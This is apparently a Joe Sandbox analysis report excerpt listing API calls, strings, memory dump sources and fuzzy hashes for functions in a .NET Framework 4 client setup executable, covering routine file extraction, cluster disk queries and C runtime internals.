                                                                                                                                                                    • Failed to get the cluster property CLUSCTL_RESOURCE_GET_RESOURCE_TYPE, xrefs: 00017F34
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$Free$Alloc
                                                                                                                                                                    • String ID: Cluster resource type: '%S'$Failed to allocate an empty drive map$Failed to get the cluster property CLUSCTL_RESOURCE_GET_RESOURCE_TYPE$Failed to get the cluster property CLUSCTL_RESOURCE_STORAGE_GET_DISK_INFO$Found a partition on cluster resource: '%S'$Ignoring cluster resource as it's not a Physical Disk$Ignoring the partition '%S' because it doesn't look like a DOS name$Physical Disk
                                                                                                                                                                    • API String ID: 3689955550-1827234441
                                                                                                                                                                    • Opcode ID: 78508911362f748ba304b34272ddb7848b29cc43c67f493e9c3d00d7b7475a5a
                                                                                                                                                                    • Instruction ID: e2f78c68b1f05904c57c76617bfe3c1a1e96991ca02674e6a825ae3068271ef9
                                                                                                                                                                    • Opcode Fuzzy Hash: 78508911362f748ba304b34272ddb7848b29cc43c67f493e9c3d00d7b7475a5a
                                                                                                                                                                    • Instruction Fuzzy Hash: 1441AF71D48209FBDB61EBA08C46EEFBBF9EF44340F11842AF509A6152DB705AC6CB50
                                                                                                                                                                    Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000184C7: GetLocalTime.KERNEL32(?,?,00000000), ref: 000184E2
  • Part of subcall function 000184C7: swprintf.LIBCMT ref: 00018513
• GetLastError.KERNEL32(?,40000000,00000005,00000002,08000080,?,00000000,?,?,00000000,000000FF), ref: 0001AEA7
• SetEndOfFile.KERNEL32(?,00000000,?,?,?,40000000,00000005,00000002,08000080,?,00000000,?,?,00000000,000000FF), ref: 0001AEED
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0001AF04
• ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0001AF7C
• CloseHandle.KERNEL32(?,00000000,?,?,?,40000000,00000005,00000002,08000080,?,00000000,?,?,00000000,000000FF), ref: 0001B02C
• GetLastError.KERNEL32 ref: 0001B057
  • Part of subcall function 00019B6A: SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00019B82
  • Part of subcall function 00019B6A: GetLastError.KERNEL32(?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00015AF6,X?f), ref: 00019B8C
Strings
• User canceled extraction..., xrefs: 0001B019
• Extracting file: %ws, xrefs: 0001AE06
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: File$ErrorLast$Pointer$CloseHandleLocalReadTimeswprintf
• String ID: Extracting file: %ws$User canceled extraction...
• API String ID: 1889754113-1866894759
• Opcode ID: 2ce8706aa77b20403842482b859e0de30b89d07b30290f6724b4587bcc054c1a
• Instruction ID: 190666b350d60ec78f4a1096651d69646a2d966768f8d84b04727a2d340f5849
• Opcode Fuzzy Hash: 2ce8706aa77b20403842482b859e0de30b89d07b30290f6724b4587bcc054c1a
• Instruction Fuzzy Hash: FC615170A002189FDB329BA4CCC9FEAB6F5EF4D700F1445A9F29996152D7B2DAC49F10
Uniqueness

Uniqueness Score: -1.00%

APIs
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,6CEC4150,00000024,?,00000000,00000000), ref: 00018930
• GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,0001A366,?,?,?), ref: 00018957
• HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0001A366,?,?,?,00000000,000000FF), ref: 0001895E
  • Part of subcall function 00019A43: GetProcessHeap.KERNEL32(00000000,?,?,00018CCC,?,?,00000000), ref: 00019A4D
  • Part of subcall function 00019A43: HeapSize.KERNEL32(00000000,?,00018CCC,?,?,00000000), ref: 00019A54
• GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,0001A366,?,?,?,00000000), ref: 00018968
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0001A366,?,?,?,00000000,000000FF), ref: 0001896F
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 00018992
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0001A366,?,?,?,00000000,000000FF), ref: 00018998
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Heap$Process$AllocByteCharMultiWide$ErrorLastSize
• String ID: W
• API String ID: 3423999398-655174618
• Opcode ID: e7321d49963844237dff329e415e2dc432341eec02f9e740a7a75f13688137ea
• Instruction ID: c11e58b69309a62ef712ab15992b487c037f47b3be2c4acf1ec59c567629d4cd
• Opcode Fuzzy Hash: e7321d49963844237dff329e415e2dc432341eec02f9e740a7a75f13688137ea
• Instruction Fuzzy Hash: C4214BB1900149FFDB109FA49C849FDBAB8EF05364F38CA69F251E7290DA358F809B51
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,00017F2D,?,0100002D,?,00000000,00000000,00000000), ref: 000182AB
• HeapAlloc.KERNEL32(00000000,?,?,?,00017F2D,?,0100002D,?,00000000,00000000,00000000,?,?,?,?,00017DDD), ref: 000182B2
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00017F2D,?,0100002D,?,00000000,00000000,00000000), ref: 0001831C
• HeapFree.KERNEL32(00000000,?,?,?,00017F2D,?,0100002D,?,00000000,00000000,00000000,?,?,?,?,00017DDD), ref: 00018323
Strings
• Failed to allocate memory for the cluster resource property buffer, xrefs: 000182C3
• Failed to retrieve the the cluster resource property value, xrefs: 00018300
• Failed to retrieve the size from the cluster resource property buffer, xrefs: 00018293
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: Failed to allocate memory for the cluster resource property buffer$Failed to retrieve the size from the cluster resource property buffer$Failed to retrieve the the cluster resource property value
• API String ID: 756756679-2748719997
• Opcode ID: e7443f604918be9ce172fad79b4f2d8c23543c96c6dd21b3ad97b61ac9784b7a
• Instruction ID: 5833e7f83ea730600eda8931ddba21408830c886f8adf29557c191f133170e75
• Opcode Fuzzy Hash: e7443f604918be9ce172fad79b4f2d8c23543c96c6dd21b3ad97b61ac9784b7a
• Instruction Fuzzy Hash: BF219C72901214BFDB225BA1DD49DEF7FACEF45B60B208425F504D6150DA388BC097A0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,00036E90,00000008,0002A729,00000000,00000000,?,0002DBEB,?,00000001,?,?,0002D143,00000018,00036FA0,0000000C), ref: 0002A62D
• __lock.LIBCMT ref: 0002A661
  • Part of subcall function 0002D1BD: __mtinitlocknum.LIBCMT ref: 0002D1D3
  • Part of subcall function 0002D1BD: __amsg_exit.LIBCMT ref: 0002D1DF
  • Part of subcall function 0002D1BD: EnterCriticalSection.KERNEL32(?,?,?,0002A803,0000000D,00036EB8,00000008,000337A4,?,00000000), ref: 0002D1E7
• InterlockedIncrement.KERNEL32(0003A448), ref: 0002A66E
• __lock.LIBCMT ref: 0002A682
• ___addlocaleref.LIBCMT ref: 0002A6A0
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
• String ID: KERNEL32.DLL
• API String ID: 637971194-2576044830
                                                                                                                                                                    • Opcode ID: a64f7f1be9d9e48625e13908ecf5ea0a93acdbf3575bd0902a6773ffc5318f04
                                                                                                                                                                    • Instruction ID: f1b31a0b04737b9986e2aa5a3612000348fbc5e1476522c34d757134e958f556
                                                                                                                                                                    • Opcode Fuzzy Hash: a64f7f1be9d9e48625e13908ecf5ea0a93acdbf3575bd0902a6773ffc5318f04
                                                                                                                                                                    • Instruction Fuzzy Hash: 13018471540710EFE721EF65E80A789FBE0AF01324F10890EE5E6967A2CBB4A644CF16
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __getptd.LIBCMT ref: 00034FE2
                                                                                                                                                                      • Part of subcall function 0002A753: __getptd_noexit.LIBCMT ref: 0002A756
                                                                                                                                                                      • Part of subcall function 0002A753: __amsg_exit.LIBCMT ref: 0002A763
                                                                                                                                                                    • __getptd.LIBCMT ref: 00034FF3
                                                                                                                                                                    • __getptd.LIBCMT ref: 00035001
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                    • API String ID: 803148776-2671469338
                                                                                                                                                                    • Opcode ID: 8c2ebab0d2ed4d0fea42efe5ed5d7f483909f0bfe9a5f0ac829d02d42dc837ac
                                                                                                                                                                    • Instruction ID: 876a0e0a837a36fc52ea599c7e9cb54b04f97517c024f71da57b12c4e805a13f
                                                                                                                                                                    • Opcode Fuzzy Hash: 8c2ebab0d2ed4d0fea42efe5ed5d7f483909f0bfe9a5f0ac829d02d42dc837ac
                                                                                                                                                                    • Instruction Fuzzy Hash: CCE04F316041148FC764AB68D44ABAC33E8FF89315F5944F1E80CCB233CB38E8548987
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __CreateFrameInfo.LIBCMT ref: 000352BE
                                                                                                                                                                      • Part of subcall function 00034CDB: __getptd.LIBCMT ref: 00034CE9
                                                                                                                                                                      • Part of subcall function 00034CDB: __getptd.LIBCMT ref: 00034CF7
                                                                                                                                                                    • __getptd.LIBCMT ref: 000352C8
                                                                                                                                                                      • Part of subcall function 0002A753: __getptd_noexit.LIBCMT ref: 0002A756
                                                                                                                                                                      • Part of subcall function 0002A753: __amsg_exit.LIBCMT ref: 0002A763
                                                                                                                                                                    • __getptd.LIBCMT ref: 000352D6
                                                                                                                                                                    • __getptd.LIBCMT ref: 000352E4
                                                                                                                                                                    • __getptd.LIBCMT ref: 000352EF
                                                                                                                                                                    • _CallCatchBlock2.LIBCMT ref: 00035315
                                                                                                                                                                      • Part of subcall function 00034D8F: __CallSettingFrame@12.LIBCMT ref: 00034DDB
                                                                                                                                                                      • Part of subcall function 000353BC: __getptd.LIBCMT ref: 000353CB
                                                                                                                                                                      • Part of subcall function 000353BC: __getptd.LIBCMT ref: 000353D9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1602911419-0
                                                                                                                                                                    • Opcode ID: f1249dbd8b9773a74c5238900f28c80350d2e397f6e65c02be4a40f77a5aad32
                                                                                                                                                                    • Instruction ID: fbf01277cdfbc7b620c422e30d270446810b6a73b36a76f413e62947306a2132
                                                                                                                                                                    • Opcode Fuzzy Hash: f1249dbd8b9773a74c5238900f28c80350d2e397f6e65c02be4a40f77a5aad32
                                                                                                                                                                    • Instruction Fuzzy Hash: 681119B5D04209DFDB01EFA4D846BED7BB4FF04310F1080A9F814AB262DB789A119F55
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __getptd.LIBCMT ref: 0002C595
                                                                                                                                                                      • Part of subcall function 0002A753: __getptd_noexit.LIBCMT ref: 0002A756
                                                                                                                                                                      • Part of subcall function 0002A753: __amsg_exit.LIBCMT ref: 0002A763
                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 0002C5B5
                                                                                                                                                                    • __lock.LIBCMT ref: 0002C5C5
                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0002C5E2
                                                                                                                                                                    • _free.LIBCMT ref: 0002C5F5
                                                                                                                                                                    • InterlockedIncrement.KERNEL32(023D1660), ref: 0002C60D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3470314060-0
                                                                                                                                                                    • Opcode ID: ad654df8b2e27b930b59f086824d0a31aaa96ae22954681820ccae5b06df2421
                                                                                                                                                                    • Instruction ID: 2e8248cc7a529d1ac61e937231729be7a6847361d839891fe8960898ab988447
                                                                                                                                                                    • Opcode Fuzzy Hash: ad654df8b2e27b930b59f086824d0a31aaa96ae22954681820ccae5b06df2421
                                                                                                                                                                    • Instruction Fuzzy Hash: A801A132A04F31EBEB66AB24B405BDD77E4AF02710F144106E84467692CB68E982CBD6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00019CA3: CreateFileW.KERNELBASE(?,?,?,00000000,00015AE3,?,00000000,?,00000000,?,?,?,0001843A,?,40000000,00000005), ref: 00019CD2
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,80000000,00000007,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,?,?,0001A8F1), ref: 0001A9EE
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000024,?,00000000,00000000,80000000,00000007,00000003,00000080,00000000,00000000,00000000), ref: 0001AA2C
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,0001A8F1,?,00000000,00000004,?,00000000,?), ref: 0001AA36
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0001AAED
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                                    • String ID: $
                                                                                                                                                                    • API String ID: 3160720760-3993045852
                                                                                                                                                                    • Opcode ID: e7b1ee955a4a1446bf12fb29af92055bfc4fbc183603357288c44c299b102206
                                                                                                                                                                    • Instruction ID: 3463be055af0b841db95c521b84813d7bcafd10dd72cb121c57f7ffe4fd83d2c
                                                                                                                                                                    • Opcode Fuzzy Hash: e7b1ee955a4a1446bf12fb29af92055bfc4fbc183603357288c44c299b102206
                                                                                                                                                                    • Instruction Fuzzy Hash: 41416F71E012099FCB61CF69DA44AEDB7F4AF4A320F648619E521E7180D37499C4CF67
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000000,X?f,?,?,00016488,00000000,00000000,74DF23A0,?,00015BF4), ref: 00019C43
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00016488,00000000,00000000,74DF23A0,?,00015BF4), ref: 00019C53
                                                                                                                                                                    • MoveFileExW.KERNEL32(00000000,00000000,00000004,?,?,00016488,00000000,00000000,74DF23A0,?,00015BF4), ref: 00019C64
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00016488,00000000,00000000,74DF23A0,?,00015BF4), ref: 00019C6E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: ErrorFileLast$DeleteMove
• String ID: X?f
• API String ID: 4226254011-1642154059
• Opcode ID: 59c20dc46610c26b90622eec582ea669c4df1826f80ad8c06f3e33b65ee347be
• Instruction ID: d48fbad744b5ddce9b24ecd45a8690c1c5d6b5e6d002160277d35a00759a7917
• Opcode Fuzzy Hash: 59c20dc46610c26b90622eec582ea669c4df1826f80ad8c06f3e33b65ee347be
• Instruction Fuzzy Hash: 1F01443760020567E7215769CD65BDABAEE8FC0364F260034EB05E7101EA38DD8182E8
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___BuildCatchObject.LIBCMT ref: 00035665
  • Part of subcall function 000355BB: ___BuildCatchObjectHelper.LIBCMT ref: 000355F1
• _UnwindNestedFrames.LIBCMT ref: 0003567C
• ___FrameUnwindToState.LIBCMT ref: 0003568A
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
• String ID: csm$csm
• API String ID: 2163707966-3733052814
• Opcode ID: e371cabbb856675a566eb448d13e963a276105ceaaefeb0375b179d063171748
• Instruction ID: 68bed504c62b263a2ab178fc223dbc9bde69de53cd0dbc099b9a4ece21f19d69
• Opcode Fuzzy Hash: e371cabbb856675a566eb448d13e963a276105ceaaefeb0375b179d063171748
• Instruction Fuzzy Hash: B301E475001909BBDF136E51CC46EEB7FAAEF08355F444010BD182A172DB32A9B1EBA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• _malloc.LIBCMT ref: 00031698
  • Part of subcall function 0002CDB5: __FF_MSGBANNER.LIBCMT ref: 0002CDCE
  • Part of subcall function 0002CDB5: __NMSG_WRITE.LIBCMT ref: 0002CDD5
  • Part of subcall function 0002CDB5: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0002DBEB,?,00000001,?,?,0002D143,00000018,00036FA0,0000000C,0002D1D8), ref: 0002CDFA
• _free.LIBCMT ref: 000316AB
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: AllocateHeap_free_malloc
• String ID:
• API String ID: 1020059152-0
• Opcode ID: c94ba1a20612b90b34910cfe62c656025c568cb80e3786da818bb544496d0e61
• Instruction ID: d156ae9ba0fb7c6cdded33fdb3971215706d9c82e78c998c36b3f8f91a7fc361
• Opcode Fuzzy Hash: c94ba1a20612b90b34910cfe62c656025c568cb80e3786da818bb544496d0e61
• Instruction Fuzzy Hash: 6A11CD32809624ABDB372BB5BC067DE37ACAF4C3A1F298526F95CDB152DB348C405794
Uniqueness

Uniqueness Score: -1.00%

APIs
• __getptd.LIBCMT ref: 0002CD43
  • Part of subcall function 0002A753: __getptd_noexit.LIBCMT ref: 0002A756
  • Part of subcall function 0002A753: __amsg_exit.LIBCMT ref: 0002A763
• __getptd.LIBCMT ref: 0002CD5A
• __amsg_exit.LIBCMT ref: 0002CD68
• __lock.LIBCMT ref: 0002CD78
• __updatetlocinfoEx_nolock.LIBCMT ref: 0002CD8C
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
• Opcode ID: fb64305dd2c3803fb9e59a80f22fb2dbe75fcad9177ba7f5f5cd8fc8a5b80a15
• Instruction ID: 48990b7036bc54831e1fd579a64e6bb3c2f9f0624ca9b800883ef08d502f44b3
• Opcode Fuzzy Hash: fb64305dd2c3803fb9e59a80f22fb2dbe75fcad9177ba7f5f5cd8fc8a5b80a15
• Instruction Fuzzy Hash: 21F09032A087309BF662BB64B803F9D77A06F02720F25815AF455AA1D3CF645901DA9B
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00029A87: _doexit.LIBCMT ref: 00029A93
• ___set_flsgetvalue.LIBCMT ref: 0003374B
  • Part of subcall function 0002A57F: TlsGetValue.KERNEL32(?,00033750), ref: 0002A588
  • Part of subcall function 0002A57F: _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,00033750), ref: 0002A59A
  • Part of subcall function 0002A57F: TlsSetValue.KERNEL32(00000000,?,00033750), ref: 0002A5A9
• ___fls_getvalue@4.LIBCMT ref: 00033756
  • Part of subcall function 0002A555: TlsGetValue.KERNEL32(?,?,0003375B,00000000), ref: 0002A563
• ___fls_setvalue@8.LIBCMT ref: 00033769
  • Part of subcall function 0002A5B8: _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,?,?,0003376E,00000000,?,00000000), ref: 0002A5C9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00033772
• ExitThread.KERNEL32 ref: 00033779
• GetCurrentThreadId.KERNEL32 ref: 0003377F
• __freefls@4.LIBCMT ref: 0003379F
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Value$DecodeInternal@4PointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 1443443662-0
